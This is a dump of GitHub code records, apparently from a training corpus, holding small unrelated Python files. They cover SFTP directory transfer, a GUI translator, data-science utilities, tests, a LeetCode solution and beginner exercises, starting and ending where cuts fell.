tasks.UploadTask):\n\t\t\tif not os.access(src_path, os.R_OK):\n\t\t\t\tgui_utilities.show_dialog_error('Permission Denied', self.application.get_active_window(), 'Can not read the source directory.')\n\t\t\t\treturn\n\t\t\tsrc, dst = self.local, self.remote\n\t\t\ttask = task_cls.dir_cls(src_path, dst_path, size=0)\n\t\t\tif not stat.S_ISDIR(dst.path_mode(dst_path)):\n\t\t\t\ttry:\n\t\t\t\t\tdst.make_dir(dst_path)\n\t\t\t\texcept (IOError, OSError):\n\t\t\t\t\tgui_utilities.show_dialog_error('Permission Denied', self.application.get_active_window(), 'Can not create the destination directory.')\n\t\t\t\t\treturn\n\t\telse:\n\t\t\traise ValueError('unknown task class')\n\n\t\tqueued_tasks = []\n\t\tparent_directory_tasks = collections.OrderedDict({src_path: task})\n\n\t\tfor dir_cont in src.walk(src_path):\n\t\t\tdst_base_path = dst.path_mod.normpath(dst.path_mod.join(dst_path, src.get_relpath(dir_cont.dirpath, start=src_path)))\n\t\t\tsrc_base_path = dir_cont.dirpath\n\t\t\tparent_task = parent_directory_tasks.pop(src_base_path, None)\n\t\t\tif parent_task is None:\n\t\t\t\tcontinue\n\t\t\tqueued_tasks.append(parent_task)\n\n\t\t\tnew_task_count = 0\n\t\t\tif issubclass(task_cls, tasks.DownloadTask):\n\t\t\t\tlocal_base_path, remote_base_path = (dst_base_path, src_base_path)\n\t\t\telse:\n\t\t\t\tlocal_base_path, remote_base_path = (src_base_path, dst_base_path)\n\n\t\t\tfor filename in dir_cont.filenames:\n\t\t\t\tif not self.config['transfer_hidden'] and src.path_is_hidden(src.path_mod.join(src_base_path, filename)):\n\t\t\t\t\tcontinue\n\t\t\t\ttry:\n\t\t\t\t\tfile_size = src.get_file_size(src.path_mod.join(dir_cont.dirpath, filename))\n\t\t\t\texcept (IOError, OSError):\n\t\t\t\t\tcontinue # skip this file if we 
can't get its size\n\t\t\t\ttask = task_cls(\n\t\t\t\t\tself.local.path_mod.join(local_base_path, filename),\n\t\t\t\t\tself.remote.path_mod.join(remote_base_path, filename),\n\t\t\t\t\tparent=parent_task,\n\t\t\t\t\tsize=file_size\n\t\t\t\t)\n\t\t\t\tqueued_tasks.append(task)\n\t\t\t\tnew_task_count += 1\n\n\t\t\tfor dirname in dir_cont.dirnames:\n\t\t\t\tif not self.config['transfer_hidden'] and src.path_is_hidden(src.path_mod.join(src_base_path, dirname)):\n\t\t\t\t\tcontinue\n\t\t\t\ttask = task_cls.dir_cls(\n\t\t\t\t\tself.local.path_mod.join(local_base_path, dirname),\n\t\t\t\t\tself.remote.path_mod.join(remote_base_path, dirname),\n\t\t\t\t\tparent=parent_task,\n\t\t\t\t\tsize=0\n\t\t\t\t)\n\t\t\t\tparent_directory_tasks[src.path_mod.join(src_base_path, dirname)] = task\n\t\t\t\tnew_task_count += 1\n\n\t\t\tparent_task.size += new_task_count\n\t\t\tfor grandparent_task in parent_task.parents:\n\t\t\t\tgrandparent_task.size += new_task_count\n\t\tfor task in queued_tasks:\n\t\t\tself.queue.put(task)\n\t\tself.status_display.sync_view(queued_tasks)\n","repo_name":"ProsAndCons/king-phisher-plugins","sub_path":"client/sftp_client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":23915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
+{"seq_id":"10478350207","text":"import PySimpleGUI as sg\nimport threading\n\nimport my_layout\nfrom src.utils.utils_func import translate\n\nTHREAD_EVENT = '-THREAD-'\n\ncp = sg.cprint\n\n\ndef run_gui(title, layout, events: dict = None, **kwargs):\n    window = sg.Window(title, layout.get_layout(), **kwargs)\n    while True:\n        event, values = window.read()\n        if event == '_FROM_':\n            item = values[event]\n            combo_values = layout.get_data(item)\n            window['_TO_'].update(value=combo_values[0], values=combo_values)\n        if event == \"Translate\":\n            model = f\"{values['_FROM_'].get_model()}-{values['_TO_'].get_model()}\"\n            print(model)\n            threading.Thread(target=translate, args=(window, values[0], model,), daemon=True).start()\n        if event == THREAD_EVENT:\n            window[\"-OUT-\" + sg.WRITE_ONLY_KEY].Update('')\n            cp(f'{values[THREAD_EVENT]}')\n        if event == sg.WIN_CLOSED:\n            break\n    window.close()\n\n\nif __name__ == '__main__':\n    myLayout = my_layout.Layout()\n    run_gui(\"Test_Run\", myLayout, finalize=True)\n","repo_name":"BartoszSlesar/PythonSimpleTranslationGui","sub_path":"src/simple_gui/simple_gui.py","file_name":"simple_gui.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4243027091","text":"import numpy as np\r\n\r\n\r\ndef cross_entropy(targets, predictions, epsilon=1e-12):\r\n    targets = np.array(targets)\r\n    predictions = np.array(predictions)\r\n    if len(targets.shape) == 1:\r\n        targets = np.expand_dims(targets, 0)\r\n    if len(predictions.shape) == 1:\r\n        predictions = np.expand_dims(predictions, 0)\r\n\r\n    predictions = np.clip(predictions, epsilon, 1. - epsilon)\r\n    cross_entropies = -np.sum(targets * np.log(predictions), axis=1)\r\n    # return a scalar for a single example, otherwise the per-example array\r\n    if len(cross_entropies) == 1:\r\n        return cross_entropies[0]\r\n    else:\r\n        return cross_entropies\r\n","repo_name":"tobias-kirschstein/alpha-one","sub_path":"alpha_one/metrics/entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"19747686751","text":"# 15. Write a program that prints a giant letter A like the one below. Allow\r\n# the user to specify how large the letter should be.\r\n\r\n
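# For height = 4 the goal is roughly the following (illustrative rendering,\r\n# assuming a simple two-diagonal shape with a crossbar halfway down):\r\n#     *\r\n#    * *\r\n#   *****\r\n#  *     *\r\n\r\n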
while True:\r\n    try:\r\n        height = int(input(\"Enter height of letter A: \"))\r\n        break\r\n    except ValueError:\r\n        print(\"Invalid argument.\")\r\n\r\nfor i in range(height):\r\n    if i == 0:\r\n        # apex of the A\r\n        print(\" \" * (height - i) + \"*\")\r\n    elif i == height // 2:\r\n        # crossbar of the A\r\n        print(\" \" * (height - i) + \"*\" + \"*\" * (2 * i - 1) + \"*\")\r\n    else:\r\n        # the two slanted sides\r\n        print(\" \" * (height - i) + \"*\" + \" \" * (2 * i - 1) + \"*\")\r\n","repo_name":"gregorioacerussell/CPEN60-Laboratory-Manual","sub_path":"2.5 Exercises/(15) 2.5 Exercises.py","file_name":"(15) 2.5 Exercises.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37688437374","text":"from flask import Flask, request, render_template\nimport SkinGenerator\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n@app.route('/print_color', methods=['POST'])\ndef print_color():\n    data = request.get_json()\n    color = data.get('color')\n    contrast = data.get('sliderValue')\n\n    # convert that rgb color (formatted originally as \"rgb(255, 255, 255)\") to hex\n    color = color[4:-1].split(\", \")\n    color = [int(i) for i in color]\n    color = '#%02x%02x%02x' % tuple(color)\n    print(color)\n\n    # generate the skin\n    SkinGenerator.generate_skin(color, contrast)\n\n    return 'Color received successfully'\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"CheckMC/skin-changer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34312995677","text":"from Bio import PDB\nimport pandas as pd\n\nfrom biodescriptors.calc import utils\n\n\ndef _calc_sse_content(dssp):\n    \"\"\"Calculation of secondary structure content.\"\"\"\n\n    # preparing to extract the secondary structure elements (sse) from the dssp structure\n    resamount = len(dssp.keys()) + 1\n    dssp_structures = ['H', 'B', 'E', 'G', 'I', 'T', 'S']\n    sses = list()\n\n    # extracting sse from dssp\n    for i in range(0, len(dssp.keys())):\n        if dssp[list(dssp.keys())[i]][2] in dssp_structures:\n            sses.append(dssp[list(dssp.keys())[i]][2])\n\n    # making dict of all possible secondary structures and counting their percentage\n    sse = {'Helix': sses.count('H') / resamount * 100,\n           'Beta bridge': sses.count('B') / resamount * 100,\n           'Strand': sses.count('E') / resamount * 100,\n           'Helix-3': sses.count('G') / resamount * 100,\n           'Helix-5': sses.count('I') / resamount * 100,\n           'Turn': sses.count('T') / resamount * 100,\n           'Bend': sses.count('S') / resamount * 100,\n           'Other': (resamount - len(sses)) / resamount * 100}\n\n    return sse\n\n\ndef calc_sse_content(pdb_file):\n    \"\"\"\n    Calculation of secondary structure content.\n\n    Parameters\n    ----------\n    pdb_file: str\n        Filename of .pdb file used for calculation.\n\n    Returns\n    -------\n    dict of all possible secondary structures with their percentages.\n\n    \"\"\"\n    _, _, model, _, _ = utils.get_model_and_structure(pdb_file)\n    dssp = PDB.DSSP(model, pdb_file)\n    return _calc_sse_content(dssp)\n\n\ndef sse_content_to_pandas(pdb_file, protein_name=None, **kwargs):\n    \"\"\"\n    Putting secondary structure content in pandas dataframe.\n\n    Parameters\n    ----------\n    pdb_file: str\n        Filename of .pdb file used for calculation.\n    protein_name: str, default=None\n        Protein name to be added to the resulting dataframe.\n\n    Returns\n    -------\n    pandas.DataFrame with calculated descriptor.\n\n    \"\"\"\n    cols_sse = ['prot_name', 'SSE Helix', 'SSE Beta bridge',\n                'SSE Strand', 'SSE Helix-3', 'SSE Helix-5',\n                'SSE Turn', 'SSE Bend', 'SSE Other']\n    df_sse = 
pd.DataFrame(columns=cols_sse)\n sse = None\n try:\n sse = calc_sse_content(pdb_file)\n except KeyError:\n if protein_name:\n print(f'{protein_name}: KeyError while calculating sse')\n else:\n print('KeyError while calculating sse')\n\n except ValueError as e:\n if protein_name:\n print(f'{protein_name}: {e}')\n else:\n print(e)\n\n data_sse = [protein_name]\n if sse is not None:\n for struct in sse:\n data_sse.append(sse[struct])\n df_sse = df_sse.append(pd.Series(data_sse, index=cols_sse[0:len(data_sse)]), ignore_index=True)\n return df_sse\n","repo_name":"GlukhovIgor/Descriptors_package","sub_path":"src/biodescriptors/calc/calc_sse_content.py","file_name":"calc_sse_content.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7980827777","text":"import pandas as pd\nfrom steps.src.data_processing import DataProcessor\nfrom zenml.logger import get_logger\n\nlogger = get_logger(__name__)\n\n\ndef get_data_for_test() -> pd.DataFrame:\n \"\"\"Utility function for getting sample data for test\"\"\"\n try:\n df = pd.read_csv(\"./data/customer-churn-data.csv\")\n df = df.sample(n=100)\n data_clean = DataProcessor()\n df = data_clean.encode_categorical_columns(df)\n df.drop([\"Churn\"], axis=1, inplace=True)\n return df\n except Exception as e:\n logger.error(e)\n raise e\n","repo_name":"zenml-io/zenml-projects","sub_path":"customer-churn/pipelines/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"53"} +{"seq_id":"1827686915","text":"\"\"\"\ncalendar\n---------\nAdds calendar columns to a dataframe\n\ndotw: day of the week with Monday=0, Sunday=6\ndotm: day of the month as 1,2,...\ndoty: day of the year as 1,2, ...\nmonth: month as January=1,...,December=12\nfirst_dotw: first trading day of the week\nlast_dotw: last trading day of the week\nfirst_dotm: first trading day of the month\nlast_dotm: last trading day of the month\nfirst_doty: first trading day of the year\nlast_doty: last trading day of the year\n\n\"\"\"\n\n# Use future imports for python 3.0 forward compatibility\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import division\nfrom __future__ import absolute_import\n\n# other imports\nimport pandas as pd\nfrom itertools import izip\nimport pinkfish as pf\n\ndef _first_day(row):\n first_dotw = row['dotw'] < row['__prev_dotw__']\n first_dotm = row['dotm'] < row['__prev_dotm__']\n first_doty = row['doty'] < row['__prev_doty__']\n\n return first_dotw, first_dotm, first_doty\n\ndef calendar(ts):\n \"\"\" returns timeseries with calendar columns added \"\"\"\n\n # day of the week with Monday=0, Sunday=6\n ts['dotw'] = ts.index.dayofweek\n\n # day of the month\n ts['dotm'] = ts.index.day\n\n # day of the year\n ts['doty'] = ts.index.dayofyear\n\n # month as January=1, December=12\n ts['month'] = ts.index.month\n\n # Temporarily add __prev_dotw__, __prev_dotm__, __prev_doty__\n # for convenience; drop them later\n ts['__prev_dotw__'] = ts['dotw'].shift()\n ts['__prev_dotw__'].fillna(0, inplace=True)\n\n ts['__prev_dotm__'] = ts['dotm'].shift()\n ts['__prev_dotm__'].fillna(0, inplace=True)\n\n ts['__prev_doty__'] = ts['doty'].shift()\n ts['__prev_doty__'].fillna(0, inplace=True)\n\n # First and last day of the week, month, and year\n ts['first_dotw'], ts['first_dotm'], ts['first_doty'] = \\\n izip(*ts.apply(_first_day, 
axis=1))\n\n    ts['last_dotw'] = ts['first_dotw'].shift(-1)\n    ts['last_dotw'].fillna(False, inplace=True)\n\n    ts['last_dotm'] = ts['first_dotm'].shift(-1)\n    ts['last_dotm'].fillna(False, inplace=True)\n\n    ts['last_doty'] = ts['first_doty'].shift(-1)\n    ts['last_doty'].fillna(False, inplace=True)\n\n    # Drop temporary columns\n    ts.drop(columns=['__prev_dotw__', '__prev_dotm__', '__prev_doty__'], inplace=True)\n\n    return ts\n\n","repo_name":"ArnoldKuo/pinkfish","sub_path":"pinkfish/calendar.py","file_name":"calendar.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
+{"seq_id":"45145464318","text":"from camper.db import BarcampSchema, Barcamp\nimport datetime\n\ndef test_simple(barcamps):\n    barcamp = Barcamp(\n        name = \"Barcamp\",\n        description = \"cool barcamp\",\n        slug = \"barcamp\",\n        start_date = datetime.date(2012,7,13),\n        end_date = datetime.date(2012,7,15)\n    )\n    barcamps.save(barcamp)\n\n    barcamp = barcamps.by_slug(\"barcamp\")\n    assert barcamp.name == \"Barcamp\"\n    assert barcamp.registration_date == None\n\ndef test_event(barcamps):\n    barcamp = Barcamp(\n        name = \"Barcamp\",\n        description = \"cool barcamp\",\n        slug = \"barcamp\",\n        location = {\n            'name' : \"Example City\",\n        },\n        start_date = datetime.date(2012,7,13),\n        end_date = datetime.date(2012,7,15)\n    )\n    bc = barcamps.save(barcamp)\n\n    bc = barcamps.get(bc._id)\n\n    assert len(bc.events) == 1\n    assert bc.events[0]['name'] == \"Barcamp\"\n\n","repo_name":"comlounge/baustellenac","sub_path":"baustellenac/db/tests/test_sites.py","file_name":"test_sites.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"31882604887","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfile1 = \"../7_pilon/consensus_pilon.fasta\" # One Quiver and Pilon Polishing\nfile2 = \"../../rawdata/REF/HGAP_assembly.fasta\" # illumina contig reference\nfile3 = \"../../rawdata/REF/illumina_MPG_2013_contig.fasta\" # HGAP Assembly\n\ndef get_stats(f):\n    '''\n    This function calculates the length of each contig and returns a list containing all the contig lengths.\n    '''\n    temp = []\n    contig_len = []\n    with open(f) as file:\n        for line in file:\n            line = line.rstrip() # do not count the trailing newline in the contig length\n            if line and line[0] != '>':\n                temp.append(line)\n            elif line and line[0] == '>' and len(temp) != 0:\n                contig_len.append(sum(len(nt) for nt in temp))\n                temp = [] # reset the buffer for the next contig\n    if temp: # the final contig is not followed by a header line, so flush it here\n        contig_len.append(sum(len(nt) for nt in temp))\n    return contig_len\n\n\n# making graph\n\nx1 = sorted(get_stats(file1), reverse=True)\nx2 = sorted(get_stats(file2), reverse=True)\nx3 = sorted(get_stats(file3), reverse=True)\n\n\ny1 = np.arange(1, len(x1)+1) / len(x1)\ny2 = np.arange(1, len(x2)+1) / len(x2)\ny3 = np.arange(1, len(x3)+1) / len(x3)\n\n\nplt.xlim(12000000, 0) # invert the x axis\n\nplot1 = plt.plot(x1, y1, marker = '.', linestyle = '-')\nplot2 = plt.plot(x2, y2, marker = '.', linestyle = '-')\nplot3 = plt.plot(x3, y3, marker = '.', linestyle = '-')\n\nplt.legend(['One Quiver and Pilon Polishing', 'Illumina Reference', \"HGAP Assembly\"], loc='best')\n\nplt.xlabel(\"Contig Length\")\nplt.ylabel(\"Cumulative Probability\")\n\nplt.margins(0.02) # avoid out of range values\n\n\nplt.savefig('CDF.png')\n# plt.show()\n\n","repo_name":"zjspj/Yeast_genome_assembly_CS199","sub_path":"Analysis/CDF/cdf_graph.py","file_name":"cdf_graph.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72070908647","text":"# 给定一个由 0 和 1 组成的矩阵 matrix ,找出只包含 1 的最大矩形,并返回其面积。 \n# \n# 注意:此题 matrix 输入格式为一维 01 字符串数组。 \n# \n# \n# \n# 示例 1: \n# \n# \n# \n# \n# 输入:matrix = [\"10100\",\"10111\",\"11111\",\"10010\"]\n# 输出:6\n# 解释:最大矩形如上图所示。\n# \n# \n# 示例 2: \n# \n# \n# 输入:matrix = []\n# 输出:0\n# \n# \n# 示例 3: \n# \n# \n# 输入:matrix = [\"0\"]\n# 输出:0\n# \n# \n# 示例 4: \n# \n# \n# 输入:matrix = [\"1\"]\n# 输出:1\n# \n# \n# 示例 5: \n# \n# \n# 输入:matrix = [\"00\"]\n# 输出:0\n# \n# \n# \n# \n# 提示: \n# \n# \n# rows == matrix.length \n# cols == matrix[0].length \n# 0 <= row, cols <= 200 \n# matrix[i][j] 为 '0' 或 '1' \n# \n# \n# \n# \n# 注意:本题与主站 85 题相同(输入参数格式不同): https://leetcode-cn.com/problems/maximal-\n# rectangle/ \n# Related Topics 栈 数组 动态规划 矩阵 单调栈 👍 23 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n\nfrom typing import List\n\n\nclass Solution:\n def maximalRectangle(self, matrix: List[List[str]]) -> int:\n \"\"\"\n 方法1:计算每行到当前元素时1的数量\n \"\"\"\n res = 0\n if not matrix:\n return res\n m = len(matrix)\n n = len(matrix[0])\n pre_sum = [[0 for _ in range(n)] for _ in range(m)]\n for i in range(m):\n for j in range(n):\n # 第一列直接赋值\n if j == 0:\n pre_sum[i][j] = int(matrix[i][j])\n elif matrix[i][j] == '1':\n pre_sum[i][j] = pre_sum[i][j - 1] + 1\n # print(pre_sum)\n\n for i in range(m):\n for j in range(n):\n if pre_sum[i][j] == 0:\n continue\n # 计算矩形宽的最小值,以及高。\n high = 0\n width = pre_sum[i][j]\n rec = 0\n for k in range(i, -1, -1):\n if pre_sum[k][j] == 0:\n break\n high += 1\n width = min(width, pre_sum[k][j])\n # 计算以当前元素为右下角的矩形的最大值。\n rec = max(rec, high * width)\n res = max(rec, res)\n\n return res\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n# if __name__ == '__main__':\n# # matrix = [[\"1\", \"0\", \"1\", \"0\", \"0\"], [\"1\", \"0\", \"1\", \"1\", \"1\"], [\"1\", \"1\", \"1\", \"1\", \"1\"],\n# # [\"1\", \"0\", \"0\", \"1\", \"0\"]]\n# matrix = [[\"0\", \"0\", \"1\", \"0\"], [\"0\", \"0\", \"1\", \"0\"], [\"0\", \"0\", \"1\", \"0\"], [\"0\", \"0\", \"1\", \"1\"],\n# [\"0\", \"1\", \"1\", \"1\"], [\"0\", \"1\", \"1\", \"1\"], [\"1\", \"1\", \"1\", \"1\"]]\n# result = Solution().maximalRectangle(matrix)\n# print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[剑指 Offer II 040]矩阵中最大的矩形.py","file_name":"[剑指 Offer II 040]矩阵中最大的矩形.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34402949382","text":"from test_base import TestBase\n\nimport datetime\nimport json\n\nfrom uploader import Uploader\n\nimport openapi_client\nfrom openapi_client.rest import ApiException\n\nclass TestIndividual(TestBase):\n\n\n _locations = []\n\n \"\"\"\n \"\"\"\n @classmethod\n def setUpClass(self):\n\n super(TestIndividual, self).setUpClass()\n sd = Uploader(self._config_file)\n sd.use_message_buffer = True\n json_data = json.loads('''{\n \"values\": {\n \"unique_id\": {\n \"column\": 2,\n \"type\": \"string\"\n },\n \"unique_os_id\": {\n \"column\": 2,\n \"type\": \"string\"\n },\n \"sample_oxford_id\": {\n \"column\": 3,\n \"type\": \"string\"\n },\n \"sample_alternate_oxford_id\": {\n \"column\": 4,\n \"type\": \"string\"\n },\n \"sample_source_id\": {\n \"column\": 6,\n \"type\": \"string\"\n },\n \"donor_source_code\": {\n \"column\": 7,\n \"type\": \"string\"\n },\n \"sample_source_type\": {\n \"column\": 8,\n \"type\": \"string\"\n },\n \"species\": {\n \"column\": 11,\n \"type\": \"string\"\n }\n }\n}''')\n 
        sd.load_data_file(json_data, 'individual.tsv')\n\n        self._messages = sd.message_buffer\n\n    \"\"\"\n    \"\"\"\n    @classmethod\n    def tearDownClass(self):\n\n        self.deleteEventSets(['individual'], TestIndividual._locations)\n\n\n    \"\"\"\n    \"\"\"\n    def test_individual(self):\n\n\n        try:\n            looked_up = self._dao.download_sampling_events_by_os_attr('oxford_id',\n                                                                      'TS0001-C')\n            looked_up = looked_up.sampling_events[0]\n\n            individual = self._dao.download_individual(looked_up.individual_id)\n\n            assert individual.attrs\n            assert individual.attrs[0].attr_value == '3D7'\n\n            looked_up1 = self._dao.download_sampling_events_by_os_attr('oxford_id',\n                                                                       'TS0001-CW7')\n            looked_up1 = looked_up1.sampling_events[0]\n\n            individual1 = self._dao.download_individual(looked_up1.individual_id)\n\n            assert individual1.attrs\n            assert individual1.attrs[0].attr_value == '3D7'\n\n            assert looked_up.individual_id == looked_up1.individual_id\n\n        except ApiException as error:\n            self.fail(\"test_individual: Exception when calling download_sampling_event_by_attr {}\"\n                      .format(error))\n\n    \"\"\"\n    \"\"\"\n    def test_no_individual(self):\n\n\n        try:\n            looked_up = self._dao.download_sampling_events_by_os_attr('oxford_id',\n                                                                      'TS0001-CW5')\n            looked_up = looked_up.sampling_events[0]\n\n            assert looked_up.individual is None\n\n\n        except ApiException as error:\n            self.fail(\"test_no_individual: Exception when calling download_sampling_event_by_attr {}\"\n                      .format(error))\n","repo_name":"malariagen/sims-backbone","sub_path":"upload/test/test_individual.py","file_name":"test_individual.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"19167749651","text":"import os\r\nimport sys\r\n\r\ndirectory = \".\\site\\includes\"\r\n\r\n# code adapted from https://stackoverflow.com/a/2212728\r\nfor folder, subs, files in os.walk(directory):\r\n    for filename in files:\r\n        if filename.endswith(\".html\"):\r\n            with open(os.path.join(folder, filename), 'r') as src:\r\n                jsFile = os.path.join(folder, os.path.basename(filename).split(\".\")[0] + \".js\")\r\n                with open(jsFile, 'w') as dest:\r\n                    compressedContent = src.read().replace('\\n','').replace('\\r','')\r\n                    dest.write(\"document.write('\" + compressedContent + \"')\")","repo_name":"JoshuaJLi/blogoblag","sub_path":"htmlJsConvertor.py","file_name":"htmlJsConvertor.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21802749907","text":"import numpy as np\n\n#1. Generate an arithmetic sequence starting at 0 and ending at 20 with a common difference of 1.\na = np.arange(0,21,1)\nprint(a)\n\n#2. Using the sequence above, extract the even numbers.\n\n# method 1\nfor i in a:\n    if i%2 == 0:\n        print(\"Even number in the sequence: \"+str(i))\n# method 2\neven_array = a[::2]\nprint(even_array)\n\n#3. Using the sequence from 1, extract the multiples of 3.\n\n# method 1\nfor i in a:\n    if i%3 == 0:\n        print(\"Multiple of 3 in the sequence: \"+str(i))\n# method 2 (note: this slice starts at index 3, so unlike the loop above it skips 0)\narray_3 = a[3::3]\nprint(array_3)\n# getting familiar with array usage\nimport numpy as np\nx=np.array([[1,2,3],[5,6,7],[7,8,9]])\nprint(x[:,::5])","repo_name":"may4025425/ML100Days","sub_path":"homework/D01.py","file_name":"D01.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15773924600","text":"from sacnn.core import SacnnModel, get_arch\nfrom sacnn.core.preprocessing import process_sentences\n\nfrom .instance_stack import InstanceStack\nfrom .app_state import app_state\nfrom .constraints import FILTERS, SENTENCE_LENGTH\nfrom .word_to_vector import word_to_vector, WORD_DIMENSION\n\n\n
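# The controller below restores a trained model the first time an instance name is\n# requested, and keeps at most max_stack restored models cached in the InstanceStack.\n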
class ClassifierController():\n\n    def __init__(self, max_stack=2):\n        \"\"\"\n        :param int max_stack:\n        \"\"\"\n        self._instance_stack = InstanceStack(max_stack)\n\n    def select_instance(self, instance_name):\n        \"\"\"\n        :param str instance_name:\n        \"\"\"\n        if instance_name not in self._instance_stack:\n            instance_data = app_state.get_instance_by_name(instance_name)\n\n            if instance_data is not None:\n                (name, hidden_units, num_labels, arch) = instance_data\n\n                hyperparams = {\n                    'name': instance_name,\n                    'arch': arch,\n                    'sentence_length': SENTENCE_LENGTH,\n                    'word_dimension': WORD_DIMENSION,\n                    'hidden_units': int(hidden_units),\n                    'filters': FILTERS,\n                    'num_labels': int(num_labels),\n                }\n                model = SacnnModel(get_arch(hyperparams))\n                model.restore()\n                self._instance_stack.push(model)\n            else:\n                raise BaseException('instance_not_found_by_name')\n\n    def classify(self, instance_name, comments):\n        \"\"\"\n        :param str instance_name:\n        :param str comment:\n        :returns str:\n        \"\"\"\n        self.select_instance(instance_name)\n        instance = self._instance_stack[instance_name]\n        input_data = process_sentences(comments, SENTENCE_LENGTH, WORD_DIMENSION, word_to_vector)\n\n        return instance.sentiment(input_data)\n","repo_name":"aicroe/sacnn","sub_path":"src/sacnn/app/classifier_controller.py","file_name":"classifier_controller.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7734458857","text":"# _*_ coding : utf-8 _*_\n# @Time : 2023/8/1 18:01\n# @Author : nancy_xieyy@icloud.com\n# @File : 03 变量类型\n# @Project : Python\n\n# Basic usage\n# int\nmoney = 5000\n# float\nmoney1 = 1.5\n\n# boolean\n# used in flow-control statements; in real-world development a gender field is usually named sex or gender\n# True stands for male here\nsex = True\n\n# string\ns = \"雷猴\"\n\n# list\n# when fetching a lot of data you can store it in a list and then access it directly through the list\nname_list = ['周杰伦', '科比']\nprint(name_list)\n\n# tuple\nage_tuple = (18, 19, 20)\nprint(age_tuple)\n\n# dict\n# use case: the scrapy framework\nperson = {'name':'Tom', 'age':18}\nprint(person)","repo_name":"nancyxieyy/Python","sub_path":"04 变量类型.py","file_name":"04 变量类型.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20413222298","text":"#!/usr/bin/env python3\n\"\"\"\nmodule for task 4\n\"\"\"\n\nimport numpy as np\nP_init = __import__('2-P_init').P_init\nHP = __import__('3-entropy').HP\n\n\ndef P_affinities(X, tol=1e-5, perplexity=30.0):\n    \"\"\"\n    calculates symmetric P affinities of data set\n    \"\"\"\n    D, P, betas, H = P_init(X, perplexity)\n    for i in range(X.shape[0]):\n        Hi, Pi = HP(np.append(D[i, :i], D[i, i+1:]), betas[i])\n        mini = None\n        maxi = None\n        Hdiff = Hi - H\n        while np.abs(Hdiff) > tol:\n            if Hdiff > 0:\n                mini = betas[i].copy()\n                if maxi is None:\n                    betas[i] = betas[i] * 2\n                else:\n                    betas[i] = (betas[i] + maxi) / 2\n            else:\n                maxi = betas[i].copy()\n                if mini is None:\n                    betas[i] = betas[i] / 2\n                else:\n                    betas[i] = (betas[i] + mini) / 2\n            Hi, Pi = HP(np.append(D[i, :i], D[i, i + 1:]), betas[i])\n            Hdiff = Hi - H\n        P[i, np.concatenate((np.r_[0:i], np.r_[i+1:X.shape[0]]))] = Pi\n    return (P.T + P) / (2 * X.shape[0])\n","repo_name":"not-notAlex/holbertonschool-machine_learning","sub_path":"unsupervised_learning/0x00-dimensionality_reduction/4-P_affinities.py","file_name":"4-P_affinities.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"43197721362","text":"#accept name and surname here\nname = 
input(\"Enter name: \")\nsurname = input(\"Enter surname: \")\n\n#accept marks here\nmaths = int(input(\"Enter maths mark: \"))\nscience = int(input(\"Enter science mark: \"))\nart = int(input(\"Enter art mark: \"))\nenglish = int(input(\"Enter english mark: \"))\nict = int(input(\"Enter ict mark: \"))\n\n#find the average and total\n\ntotal_marks = maths + science + art + english + ict\naverage = total_marks/5\n\n#pass or fail?\n\nif average < 50:\n grade = \"F\"\nelse:\n grade = \"P\"\n\n#Output section\nprint(\"name: \", name)\nprint(\"surname: \", surname)\nprint(\"total marks: \", total_marks)\nprint(\"average: \", average)\nprint(\"grade: \", grade)\n\n","repo_name":"savaged/PyFun","sub_path":"InputMarks.py","file_name":"InputMarks.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14754920383","text":"'''\n\t[문제]\n\t\t아래 배열은 3명의 학생 데이터이다.\t\t\n\t\t각 학생은 3개씩 데이터로 표현한다. \n\t\t맨 앞은 번호, 그다음은 